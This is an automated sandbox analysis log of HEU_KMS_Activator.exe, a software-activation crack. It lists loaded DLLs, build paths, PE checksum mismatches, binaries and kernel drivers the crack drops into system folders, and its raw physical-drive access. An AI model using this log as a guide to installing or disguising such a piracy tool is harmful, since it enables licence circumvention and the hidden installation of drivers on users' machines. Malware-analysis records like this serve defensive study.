Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: qmgr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsperf.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: xmllite.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: firewallapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: esent.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: flightsettings.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: policymanager.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netprofm.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: npmproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsigd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upnp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ssdpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmauto.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: miutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wsmsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dsrole.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: pcwum.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wkscli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msv1_0.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntlmshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptdll.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: webio.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rmclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usermgrcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: coremessaging.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: twinapi.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: execmodelproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: resourcepolicyclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vssapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: vsstrace.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samcli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: samlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: es.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bitsproxy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: storsvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: devobj.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: fltlib.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: ntmarta.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: bcd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wer.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: appxdeploymentclient.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: storageusage.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ifmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasmontr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasapi32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mfc42u.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rasman.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: authfwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: firewallapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dnsapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcmonitor.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3cfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dot3api.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: onex.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ncrypt.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: eappprxy.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ntasn1.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: fwcfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: hnetmon.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netshell.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nlaapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netsetupapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: netiohlp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winnsi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: httpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: activeds.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: polstore.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winipsec.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: adsldpc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: nshwfp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cabinet.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2pnetsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: p2p.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptbase.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rpcnsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: whhelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlancfg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: cryptsp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wlanapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wshelper.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wevtapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mswsock.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: peerdistsh.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wcmapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: rmclient.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mobilenetworking.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: slc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: sppc.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: gpapi.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: ktmw32.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: mprmsg.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\netsh.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: usosvc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: powrprof.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: updatepolicy.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: cabinet.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: taskschd.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: upshared.dll
Source: C:\Windows\System32\svchost.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usocoreps.dll
Source: C:\Windows\System32\svchost.exeSection loaded: usoapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iphlpapi.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: framedynos.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: sspicli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: wbemcomn.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: msxml6.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: urlmon.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: iertutil.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: srvcli.dll
Source: C:\Windows\SysWOW64\wbem\WMIC.exeSection loaded: netutils.dll
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\InProcServer32
Source: C:\Windows\SysWOW64\cmd.exe File written: C:\Windows\ScriptTemp.ini
Source: C:\Windows\_temp07242019502489\kms_x64.exe Window found: window name: SysTabControl32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\_temp07242019502489\kms_x64.exe Window detected: Number of UI elements: 15
Source: HEU_KMS_Activator.exe Static file information: File size 5596080 > 1048576
Source: C:\Windows\_temp07242019502489\7Z.EXE File opened: C:\Windows\_temp07242019502489\x86\msvcr100.dll
Source: Binary string: msvcr100.amd64.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, msvcr100.dll0.34.dr
Source: Binary string: F:\20201028P\KMDF_Protect\Release\KMDF_Protect_64.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wuhost.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, wuhost.exe.1.dr
Source: Binary string: W:\SECOPatcher\temp\Release\Win32\SECOPatcher\SECOPatcher.pdb source: 7Z.EXE, 00000022.00000003.1322653977.0000000000750000.00000004.00001000.00020000.00000000.sdmp, 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, SECOPatcher.dll.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\DvLayout.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, DvLayout.exe, 0000000B.00000000.1267571184.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe, 0000000B.00000002.1275429257.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe.1.dr
Source: Binary string: D:\Daten\Helge\Programmierung\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdb@F source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe0.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\DvLayout.pdb9 source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, DvLayout.exe, 0000000B.00000000.1267571184.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe, 0000000B.00000002.1275429257.00000000003A0000.00000002.00000001.01000000.0000000A.sdmp, DvLayout.exe.1.dr
Source: Binary string: Q:\christoh\Projects\KMS-HGM\Release\KMS-Client.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, kms-client.exe.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wdlogin.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: )}D:\Office\Target\x64\ship\licensing\x-none\CleanO15SPP.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Office\Target\x86\ship\licensing\x-none\CleanO15SPP.pdb4U source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, cleanospp.exe.34.dr
Source: Binary string: msvcr100.i386.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp, msvcr100.dll.34.dr
Source: Binary string: D:\Daten\Helge\Programmierung\SetACL3\Source\SetACL.exe\Win32\Release\SetACL.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe0.34.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wrme.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.dr
Source: Binary string: D:\Daten\Helge\Programmierung\SetACL3\Source\SetACL.exe\x64\Release\SetACL.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000024C3000.00000004.00000020.00020000.00000000.sdmp, SetACL.exe.34.dr
Source: Binary string: \LookFile\KMDF_LOOK\Release\KMDF_LOOK_32.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: W:\SECOPatcher\temp\Release\x64\SECOPatcher\SECOPatcher.pdb source: 7Z.EXE, 00000022.00000003.1322653977.0000000000750000.00000004.00001000.00020000.00000000.sdmp, 7Z.EXE, 00000022.00000003.1321709735.00000000025E6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: F:\20201028P\KMDF_Protect\Release\KMDF_Protect_32.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\Office\Target\x86\ship\licensing\x-none\CleanO15SPP.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, cleanospp.exe.34.dr
Source: Binary string: D:\Office\Target\x64\ship\licensing\x-none\CleanO15SPP.pdb source: 7Z.EXE, 00000022.00000003.1321709735.00000000022D9000.00000004.00000020.00020000.00000000.sdmp, cleanospp.exe0.34.dr
Source: Binary string: E:\work\Icon_Report\Release\_service.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, _J8156NOVDEC.exe, 00000002.00000002.1265530113.00000000006E8000.00000002.00000001.01000000.00000005.sdmp, _J8156NOVDEC.exe, 00000002.00000000.1250640362.00000000006E8000.00000002.00000001.01000000.00000005.sdmp, _J8156NOVDEC.exe, 00000002.00000003.1251454537.0000000001566000.00000004.00000020.00020000.00000000.sdmp, J8156NOVDEC.exe, 00000003.00000000.1258172666.0000000000CA8000.00000002.00000001.01000000.00000006.sdmp, J8156NOVDEC.exe, 00000003.00000002.2505697815.0000000000CA8000.00000002.00000001.01000000.00000006.sdmp, _J8156NOVDEC.exe.1.dr, J8156NOVDEC.exe.2.dr, nsjB6CE.tmp.1.dr
Source: Binary string: \LookFile\KMDF_LOOK\Release\KMDF_LOOK_64.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.000000000292C000.00000004.00000020.00020000.00000000.sdmp, KMDF_LOOK.sys.1.dr
Source: Binary string: D:\Work\Install_Driver\Driver_helper\Release\wccenter.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, HEU_KMS_Activator.exe, 00000001.00000002.1280400655.0000000000414000.00000004.00000001.01000000.00000003.sdmp, wccenter.exe.1.dr
Source: Binary string: Z-D:\Work\Install_Driver\Driver_helper\Release\wrme.pdb source: HEU_KMS_Activator.exe, 00000001.00000002.1281058789.0000000002784000.00000004.00000020.00020000.00000000.sdmp, wrme.exe, 00000011.00000002.1339432193.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe, 00000011.00000000.1272801464.0000000000EDA000.00000002.00000001.01000000.0000000C.sdmp, wrme.exe.1.dr
Source: C:\Users\user\Desktop\HEU_KMS_Activator.exe Code function: 1_2_00405F56 GetModuleHandleA,LoadLibraryA,GetProcAddress, 1_2_00405F56
Source: kms-server.exe.34.dr Static PE information: real checksum: 0x0 should be: 0xe21f
Source: kms-client.exe.34.dr Static PE information: real checksum: 0x0 should be: 0x17708
Source: HEU_KMS_Activator.exe Static PE information: real checksum: 0x0 should be: 0x56291d
Source: SECOPatcher.dll0.34.dr Static PE information: real checksum: 0x0 should be: 0x2906
Source: HEU_KMS_Activator.exe.1.dr Static PE information: real checksum: 0x4d4fb7 should be: 0x4dc854
Source: kms.exe.34.dr Static PE information: real checksum: 0xf4931 should be: 0xfc615
Source: SECOPatcher.dll.34.dr Static PE information: real checksum: 0x0 should be: 0xe02d
Source: System.dll.1.dr Static PE information: real checksum: 0x0 should be: 0x9e55
Source: kms_x64.exe.34.dr Static PE information: real checksum: 0x1108fd should be: 0x117de7
Source: HEU_KMS_Activator.exe.4.dr Static PE information: real checksum: 0x4d4fb7 should be: 0x4dc854
Source: 7Z.EXE.4.dr Static PE information: real checksum: 0x0 should be: 0x93a5b
Source: 7Z.EXE.4.dr Static PE information: section name: .sxdata
Source: msvcr100.dll0.34.dr Static PE information: section name: _CONST
Source: msvcr100.dll0.34.dr Static PE information: section name: text
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: 2_2_006C00C1 push ecx; ret 2_2_006C00D4
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: 2_2_006A62A1 push 00000000h; ret 2_2_006A62A8
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: 2_2_006A6281 push 00000000h; iretd 2_2_006A62A0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: 2_2_0068C298 pushfd ; retn 0068h 2_2_0068C299
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: 3_2_00C800C1 push ecx; ret 3_2_00C800D4
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: 3_2_00C360EF pushad ; ret 3_2_00C360F2
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: 3_2_00C80656 push ecx; ret 3_2_00C80669
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: 3_2_00C39C65 pushfd ; ret 3_2_00C39C66
Source: C:\Users\user\AppData\Local\Temp\HEU_KMS_Activator.exe Code function: 4_2_00D58AC5 push ecx; ret 4_2_00D58AD8
Source: C:\Windows\System32\drivers\DvLayout.exe Code function: 11_2_0037C284 push ecx; ret 11_2_0037C296
Source: C:\Windows\System32\drivers\DvLayout.exe Code function: 11_2_0037BAF0 push ecx; ret 11_2_0037BB03
Source: C:\Users\user\AppData\Local\Microsoft\Event Viewer\wrme.exe Code function: 17_2_00EB56A6 push ecx; ret 17_2_00EB56B9
Source: C:\Windows\_temp07242019502489\7Z.EXE Code function: 34_2_0046CC80 push eax; ret 34_2_0046CCAE
Source: C:\Windows\_temp07242019502489\7Z.EXE Code function: 34_2_00459590 push ecx; mov dword ptr [esp], ecx 34_2_00459591
Source: C:\Windows\_temp07242019502489\7Z.EXE Code function: 34_2_0046B890 push eax; ret 34_2_0046B8AE
Source: msvcr100.dll.34.dr Static PE information: section name: .text entropy: 6.90903234258047

Persistence and Installation Behavior

Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE 2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR DeviceIoControl() %d, DFP_GET_VERSION) returned 0, error is %d 2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR No device found at iPosition %d (%d) 2_2_00632A30
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 2_2_00632CF0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR, CreateFileA(%s) returned INVALID_HANDLE_VALUE Error Code %d 2_2_00632CF0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: CreateFileA,GetLastError,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTUsingSmart ERROR DeviceIoControl(%d, SMART_GET_VERSION) returned 0, error is %d 2_2_00632CF0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, \\.\PhysicalDrive%d 2_2_006330D0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %d ReadPhysicalDriveInNTWithZeroRights ERROR CreateFileA(%s) returned INVALID_HANDLE_VALUE 2_2_006330D0
Source: C:\Users\user\AppData\Local\Temp\_J8156NOVDEC.exe Code function: CreateFileA,DeviceIoControl,DeviceIoControl,GetLastError,CloseHandle, %s ReadPhysicalDriveInNTWithZeroRights ERROR DeviceIoControl(), IOCTL_DISK_GET_DRIVE_GEOMETRY_EX) returned 0 2_2_006330D0
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, \\.\PhysicalDrive%d 3_2_00BF2A30
Source: C:\Users\user\AppData\Local\Temp\J8156NOVDEC.exe Code function: CreateFileA,DeviceIoControl,GetLastError,DeviceIoControl,CloseHandle, %d ReadPhysicalDriveInNTWithAdminRights ERROR ,CreateFileA(%s) returned INVALID_HANDLE_VALUE 3_2_00BF2A30
